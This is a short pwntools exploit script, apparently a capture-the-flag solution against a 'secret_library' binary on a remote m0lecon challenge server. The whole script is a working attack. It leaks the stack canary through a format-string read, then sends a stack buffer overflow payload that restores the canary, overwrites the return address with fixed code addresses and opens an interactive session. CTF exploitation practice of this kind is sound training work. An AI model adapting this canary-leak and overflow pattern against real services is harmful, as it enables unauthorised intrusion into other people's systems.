#!/usr/bin/env python3
from pwn import *

CANARY_POS = 23 
CANARY_OFF = 136
elf = context.binary = ELF("./secret_library", checksec=False)

#p = process(elf.path)
p = remote('offsec.m0lecon.it', 13501)
print(p.recvline())
p.sendline(f"%{CANARY_POS}$lx".encode())
val = p.recvline().split(b",")[1].strip()
print(val)
canary = int(val, 16)
print(p.recvline())
payload = flat(
    b'A' * CANARY_OFF,
    p64(canary),
    b'B' * 8, #pass rbp
    p64(0x000000000040101a),
    p64(0x0000000000401262),
)
p.send(payload)
print(p.recvline())
#print(p.recvline())
p.interactive()